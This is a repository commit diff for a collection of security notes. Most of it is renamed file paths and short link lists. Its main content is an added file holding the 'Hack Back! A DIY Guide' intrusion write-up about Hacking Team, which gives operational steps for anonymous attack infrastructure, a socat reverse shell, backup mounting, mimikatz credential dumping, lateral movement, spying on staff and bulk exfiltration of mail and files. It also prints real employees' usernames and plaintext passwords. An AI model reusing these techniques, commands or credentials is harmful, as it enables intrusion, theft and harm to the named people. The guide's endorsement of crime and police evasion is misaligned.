Draft/Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt → Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/TCPDump.txt → Draft/Cheat sheets reference pages Checklists -/TCPDump.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/ToDO.txt → Draft/Cheat sheets reference pages Checklists -/ToDO.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt → Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Windows/Post Exploitation on Windows.txt → Draft/Cheat sheets reference pages Checklists -/Windows/Post Exploitation on Windows.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt → Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf → Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf View File

Draft/Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt → Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt View File

Draft/Draft/Conference Video Archives Stuff → Draft/Conference Video Archives Stuff View File

Draft/Draft/Counter → Draft/Counter View File

Draft/Draft/Courses & Training → Draft/Courses & Training View File

Draft/Draft/ → Draft/ View File

Draft/Draft/Cryptography & → Draft/Cryptography & View File

Draft/Draft/Cryptography & Encryption/Linux → Draft/Cryptography & Encryption/Linux Systems.txt View File

Draft/Draft/Cryptography & Encryption/Vids Papers → Draft/Cryptography & Encryption/Vids Papers Blogposts.txt View File

Draft/Draft/Cryptography & Encryption/ → Draft/Cryptography & Encryption/cull.txt View File

Draft/Draft/Darknets → Draft/Darknets View File

Draft/Draft/Data → Draft/Data View File

Draft/Draft/Disclosure → Draft/Disclosure View File

Draft/Draft/Disinformation → Draft/Disinformation View File

Draft/Draft/Documentation & Reports → Draft/Documentation & Reports View File

+ 0
- 10
Draft/Draft/Car View File

@ -1,10 +0,0 @@
#Car Hacking
[Introduction to Hacking in Car Systems - Craig Smith - Troopers15](

Draft/Draft/DRAFT Cyber Security Task Force Insurance Data Security Model Law.pdf View File

+ 0
- 0
Draft/Draft/Draft.rtf View File

Draft/Draft/NIST Cyber Security Framework for Improving Critical Infrastructure 02122014.pdf View File

Draft/Draft/PCI_DSS_v3-1.pdf View File

+ 0
- 0
Draft/Draft/Securing Hardening_1/Securing Linux/Securing Linux.rtf View File

+ 0
- 0
Draft/Draft/Securing Hardening_1/Securing OS X/Securing OS X.rtf View File

+ 0
- 9
Draft/Draft/Securing Hardening_1/Securing Windows/Cull.txt View File

@ -1,9 +0,0 @@
[Mitigating Pass-the-Hash Attacks and other credential Theft-version2](
* Official MS paper.
[Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](

+ 0
- 0
Draft/Draft/Securing Hardening_1/Securing Windows/Securing Windows.rtf View File

+ 0
- 0
Draft/Draft/To Do/To Do.rtf View File

+ 0
- 289
Draft/Draft/To Do/add cull -3.txt View File

@ -1,289 +0,0 @@
Shellsploit let's you generate customized shellcodes, backdoors, injectors for various operating system. And let's you obfuscation every byte via encoders
Urge Everyone to watch:
Hamming - You and your research
Computer SCience from the Bottom Up |
Blogpost explaining above
Linux kernel development
| **Security
| **ClearImage Free Online Barcode Reader / Decoder** |
Good source for internals section:
Defeating Sniffers and Intrustion Detection Systems - Horizon, 12/25/1998
Armouring the ELF: Binary Encryption on the UNIX Platform - grugq, scut, 12/28/2001
Runtime Process Infection - anonymous, 07/28/2002
Polymorphic Shellcode Engine Using Spectrum Analysis - theo detristan et al, 08/13/2003
Next-generation Runtime Binary Encryption using On-demand Function Extraction - Zeljko Vrba, 08/01/2005
Stealth Hooking: Another Way to Subvert the Windows Kernel - mxatone, ivanlef0u, 04/11/2008
Mystifying the Debugger for Ultimate Stealthness - halfdead, 04/11/2008
Binary Mangling with Radare - pancake, 06/11/2009
[pwndbg - Making debugging suck less](
* A PEDA replacement. In the spirit of our good friend windbg, pwndbg is pronounced pwnd-bag.
* Uses capstone as backend.
IPv6: Basic Attacks and Defences - Christopher Werny[TROOPERS15]
* [Part 1](
* [Part 2](
Decode Shellcode from cli: cat shellcode | rasm2 -d -
General Section?
[The foundation is rotting and the basement is flooding: A deeper look at the implicit trust relationships in your organization](
MS Assessment Deployment Toolkit - Measure boot times among other things
[List of hacker sites](
Cull the interesting papers
Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techiques developed for traditional Java applications.
Check under research section
Go through
Compare resources against what power-view can grab
Compare against sysmon service for scaling, setting it as service with scripting

Draft/Draft/Embedded Device & Hardware Hacking → Draft/Embedded Device & Hardware Hacking View File

Draft/Draft/ → Draft/ View File

Draft/Draft/Exploit → Draft/Exploit View File

Draft/Draft/Exploit Development/Lab for Practicing Exploit → Draft/Exploit Development/Lab for Practicing Exploit Writing.txt View File

Draft/Draft/Forensics Incident → Draft/Forensics Incident View File

Draft/Draft/Frameworks → Draft/Frameworks View File

Draft/Draft/Frameworks Methodologies/Metasploit → Draft/Frameworks Methodologies/Metasploit Reference.txt View File

Draft/Draft/Frameworks Methodologies/Meterpreter Scripts and → Draft/Frameworks Methodologies/Meterpreter Scripts and Description.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Network Footprinting.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Network Footprinting.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Password Cracking.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Password Cracking.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Penetration.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Penetration.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/VoIP Security.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/VoIP Security.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt View File

Draft/Draft/Frameworks Methodologies/Post Exploitation with → Draft/Frameworks Methodologies/Post Exploitation with Metasploit.txt View File

Draft/Draft/Fuzzing Bug → Draft/Fuzzing Bug View File

+ 14
- 0
Draft/Game View File

@ -0,0 +1,14 @@
##Game Hacking
Pince -
PINCE is a gdb front-end/reverse engineering tool focused on games, but it can be used for any reverse-engineering related stuff. PINCE is an abbreviation for "PINCE is not Cheat Engine". PINCE's GUI is heavily "inspired(;D)" by Cheat Engine.
[The Multibillion Dollar Industry That's Ignored](

Draft/Draft/Google → Draft/Google View File

+ 926
- 0
Draft/Hacking Team View File

@ -0,0 +1,926 @@
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide
_,-\ o O_/;
/ , ` `|
| \-.,___, / `
\ `-.__/ / ,.\
/ `-.__.-\` ./ \'
/ /| ___\ ,/ `\
( ( |.-"` '/\ \ `
\ \/ ,, | \ _
\| o/o / \.
\ , / /
( __`;-;'__`) \\
`//'` `||` `\
_// || __ _ _ _____ __
.-"-._,(__) .(__).-""-. | | | | |_ _| |
/ \ / \ | | |_| | | | |
\ / \ / | | _ | | | |
`'-------` `--------'` __| |_| |_| |_| |__
--[ 1 - Introduction ]----------------------------------------------------------
You'll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.
You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!
--[ 2 - Hacking Team ]----------------------------------------------------------
Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.
--[ 3 - Stay safe out there ]---------------------------------------------------
Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
1) Encrypt your hard disk [2]
I guess when the police arrive to seize your computer, it means you've
already made a lot of mistakes, but it's better to be safe.
2) Use a virtual machine with all traffic routed through Tor
This accomplishes two things. First, all your traffic is anonymized through
Tor. Second, keeping your personal life and your hacking on separate
computers helps you not to mix them by accident.
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
something custom [6]. Here's [7] a detailed comparison.
3) (Optional) Don't connect directly to Tor
Tor isn't a panacea. They can correlate the times you're connected to Tor
with the times your hacker handle is active. Also, there have been
successful attacks against Tor [8]. You can connect to Tor using other
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
before Tor, but that's less secure because they can still correlate the
hacker's activity with your house's internet activity (this was used as
evidence against Jeremy Hammond [11]).
The reality is that while Tor isn't perfect, it works quite well. When I
was young and reckless, I did plenty of stuff without any protection (I'm
referring to hacking) apart from Tor, that the police tried their hardest
to investigate, and I've never had any problems.
----[ 3.1 - Infrastructure ]----------------------------------------------------
I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:
1) Domain Names
For C&C addresses, and for DNS tunnels for guaranteed egress.
2) Stable Servers
For use as C&C servers, to receive connect-back shells, to launch attacks,
and to store the loot.
3) Hacked Servers
For use as pivots to hide the IP addresses of the stable servers. And for
when I want a fast connection without pivoting, for example to scan ports,
scan the whole internet, download a database with sqli, etc.
Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).
----[ 3.2 - Attribution ]-------------------------------------------------------
In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.
I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.
--[ 4 - Information Gathering ]-------------------------------------------------
Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.
----[ 4.1 - Technical Information ]---------------------------------------------
Some tools and techniques are:
1) Google
A lot of interesting things can be found with a few well-chosen search
queries. For example, the identity of DPR [1]. The bible of Google hacking
is the book "Google Hacking for Penetration Testers". You can find a short
summary in Spanish at [2].
2) Subdomain Enumeration
Often, a company's main website is hosted by a third party, and you'll find
the company's actual IP range thanks to subdomains like or Also, sometimes there are things that shouldn't be exposed
in "hidden" subdomains. Useful tools for discovering domains and subdomains
are fierce [3], theHarvester [4], and recon-ng [5].
3) Whois lookups and reverse lookups
With a reverse lookup using the whois information from a domain or IP range
of a company, you can find other domains and IP ranges. As far as I know,
there's no free way to do reverse lookups aside from a google "hack":
"via della moscova 13"
"via della moscova 13"
4) Port scanning and fingerprinting
Unlike the other techniques, this talks to the company's servers. I
include it in this section because it's not an attack, it's just
information gathering. The company's IDS might generate an alert, but you
don't have to worry since the whole internet is being scanned constantly.
For scanning, nmap [6] is precise, and can fingerprint the majority of
services discovered. For companies with very large IP ranges, zmap [7] or
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
----[ 4.2 - Social Information ]------------------------------------------------
For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:
1) Google
Here as well, it's the most useful tool.
2) theHarvester and recon-ng
I already mentioned them in the previous section, but they have a lot more
functionality. They can find a lot of information quickly and
automatically. It's worth reading all their documentation.
3) LinkedIn
A lot of information about the employees can be found here. The company's
recruiters are the most likely to accept your connection requests.
Previously known as jigsaw. They have contact information for many
5) File Metadata
A lot of information about employees and their systems can be found in
metadata of files the company has published. Useful tools for finding
files on the company's website and extracting the metadata are metagoofil
[1] and FOCA [2].
--[ 5 - Entering the network ]--------------------------------------------------
There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.
----[ 5.1 - Social Engineering ]------------------------------------------------
Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.
----[ 5.2 - Buying Access ]-----------------------------------------------------
Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it's employees are infosec experts, so there was a low chance that they'd
already been compromised.
----[ 5.3 - Technical Exploitation ]--------------------------------------------
After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum: -
descr: HT public subnet
Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].
--[ 6 - Be Prepared ]-----------------------------------------------------------
I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.
The post-exploitation tools that I'd prepared were:
1) busybox
For all the standard Unix utilities that the system didn't have.
2) nmap
To scan and fingerprint Hacking Team's internal network.
The most useful tool for attacking windows networks when you have access to
the internal network, but no domain user.
4) Python
To execute
5) tcpdump
For sniffing traffic.
6) dsniff
For sniffing passwords from plaintext protocols like ftp, and for
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
and NaGA, but it was hard to compile it for the system.
7) socat
For a comfortable shell with a pty:
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
And useful for a lot more, it's a networking swiss army knife. See the
examples section of its documentation.
8) screen
Like the shell with pty, it wasn't really necessary, but I wanted to feel
at home in Hacking Team's network.
9) a SOCKS proxy server
To use with proxychains to be able to access their local network from any
10) tgcd
For forwarding ports, like for the SOCKS server, through the firewall.
The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.
--[ 7 - Watch and Listen ]------------------------------------------------------
Now inside their internal network, I wanted to take a look around and think
about my next step. I started in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.
--[ 8 - NoSQL Databases ]-------------------------------------------------------
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
|_ version = 2.6.5
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases
|_ version = 2.6.5
They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.
--[ 9 - Crossed Cables ]--------------------------------------------------------
Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn't very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork
Nmap scan report for ht-synology.hackingteam.local (
3260/tcp open iscsi?
| iscsi-info:
| Target:
| Address:,0
|_ Authentication: No authentication required
Nmap scan report for synology-backup.hackingteam.local (
3260/tcp open iscsi?
| iscsi-info:
| Target:
| Address:,0
| Address:,0
|_ Authentication: No authentication required
iSCSI needs a kernel module, and it would've been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:
VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s -c VPS_IP:42838
VPS: iscsiadm -m discovery -t sendtargets -p
Now iSCSI finds the name but has problems mounting it
because it thinks its IP is instead of
The way I solved it was:
iptables -t nat -A OUTPUT -d -j DNAT --to-destination
And now, after:
iscsiadm -m node -p --login
...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
...and finally we've unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1
--[ 10 - From backups to domain admin ]-----------------------------------------
What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:
_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient '//$' -U 'hackingteam.local/besadmin%bes32678!!!'
It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
got a bunch of passwords, including the Domain Admin:
HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!
--[ 11 - Downloading the mail ]-------------------------------------------------
With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there's a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can't have a month above 12). It seems like Microsoft's engineers only
test their software with their own locale.
--[ 12 - Downloading Files ]----------------------------------------------------
Now that I'd gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:
proxychains smbclient '// DiskStation' \
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.
--[ 13 - Introduction to hacking windows domains ]------------------------------
Before continuing with the story of the "weones culiaos" (Hacking Team), I
should give some general knowledge for hacking windows networks.
----[ 13.1 - Lateral Movement ]-------------------------------------------------
I'll give a brief review of the different techniques for spreading withing a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for "in place" movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].
Remote Movement:
1) psexec
The tried and true method for lateral movement on windows. You can use
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
invoke_psexec [4], or the builtin windows command "sc" [5]. For the
metasploit module, powershell empire, and pth-winexe [6], you just need the
hash, not the password. It's the most universal method (it works on any
windows computer with port 445 open), but it's also the least stealthy.
Event type 7045 "Service Control Manager" will appear in the event logs. In
my experience, no one has ever noticed during a hack, but it helps the
investigators piece together what the hacker did afterwards.
2) WMI
The most stealthy method. The WMI service is enabled on all windows
computers, but except for servers, the firewall blocks it by default. You
can use [7], pth-wmis [6] (here's a demonstration of wmiexec and
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
wmic [5]. All except wmic just need the hash.
3) PSRemoting [10]
It's disabled by default, and I don't recommend enabling new protocols.
But, if the sysadmin has already enabled it, it's very convenient,
especially if you use powershell for everything (and you should use
powershell for almost everything, it will change [11] with powershell 5 and
windows 10, but for now powershell makes it easy to do everything in RAM,
avoid AV, and leave a small footprint)
4) Scheduled Tasks
You can execute remote programs with at and schtasks [5]. It works in the
same situations where you could use psexec, and it also leaves a well known
footprint [12].
5) GPO
If all those protocols are disabled or blocked by the firewall, once you're
Domain Admin, you can use GPO to give users a login script, install an msi,
execute a scheduled task [13], or, like we'll see with the computer of
Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
open the firewall.
"In place" Movement:
1) Token Stealing
Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain. Two tools for doing this are
incognito [1] and the mimikatz token::* commands [2].
2) MS14-068
You can take advantage of a validation bug in Kerberos to generate Domain
Admin tickets [3][4][5].
3) Pass the Hash
If you have a user's hash, but they're not logged in, you can use
sekurlsa::pth [2] to get a ticket for the user.
4) Process Injection
Any RAT can inject itself into other processes. For example, the migrate
command in meterpreter and pupy [6], or the psinject [7] command in
powershell empire. You can inject into the process that has the token you
5) runas
This is sometimes very useful since it doesn't require admin privileges.
The command is part of windows, but if you don't have a GUI you can use
powershell [8].
----[ 13.2 - Persistence ]------------------------------------------------------
Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn't needed since companies never
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it's not needed and it increases the risk of detection.
----[ 13.3 - Internal reconnaissance ]------------------------------------------
The best tool these days for understanding windows networks is Powerview [1].
It's worth reading everything written by it's author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
"net view". Other techniques that I like are:
1) Downloading a list of file names
With a Domain Admin account, you can download a list of all filenames in
the network with powerview:
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}
Later, you can read it at your leisure and choose which files to download.
2) Reading email
As we've already seen, you can download email with powershell, and it has a
lot of useful information.
3) Reading sharepoint
It's another place where many businesses store a lot of important
information. It can also be downloaded with powershell [10].
4) Active Directory [11]
It has a lot of useful information about users and computers. Without being
Domain Admin, you can already get a lot of info with powerview and other
tools [12]. After getting Domain Admin, you should export all the AD
information with csvde or another tool.
5) Spy on the employees
One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
(one of Hacking Team's sysadmins) gave me access to a Nagios server which
gave me access to the rete sviluppo (development network with the source
code of RCS). With a simple combination of Get-Keystrokes and
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
[14], and GPO, you can spy on any employee, or even on the whole domain.
--[ 14 - Hunting Sysadmins ]----------------------------------------------------
Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the "Rete Sviluppo", an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I'd
already gotten admin access. Mauro Romeo's computer didn't have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he'd mounted it and then copied off the
files. Many have made fun of Christian Pozzi's weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.
--[ 15 - The bridge ]-----------------------------------------------------------
Within Christian Pozzi's Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I'd found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it's an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).
--[ 16 - Reusing and resetting passwords ]--------------------------------------
Reading the emails, I'd seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the "forgot my password" function along with
my access to their mail server to reset the passwords.
--[ 17 - Conclusion ]-----------------------------------------------------------
That's all it takes to take down a company and stop their human rights abuses.
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.
Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don't attack systems you
don't have permission to, etc. I'll say the same, but with a more rebellious
conception of "ethical" hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves "ethical hackers" just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.
Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I'd like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.
--[ 18 - Contact ]--------------------------------------------------------------
To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.
only encrypted email please:
If not you, who? If not now, when?
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

Draft/Draft/Home → Draft/Home View File

Draft/Draft/Honeypots → Draft/Honeypots View File

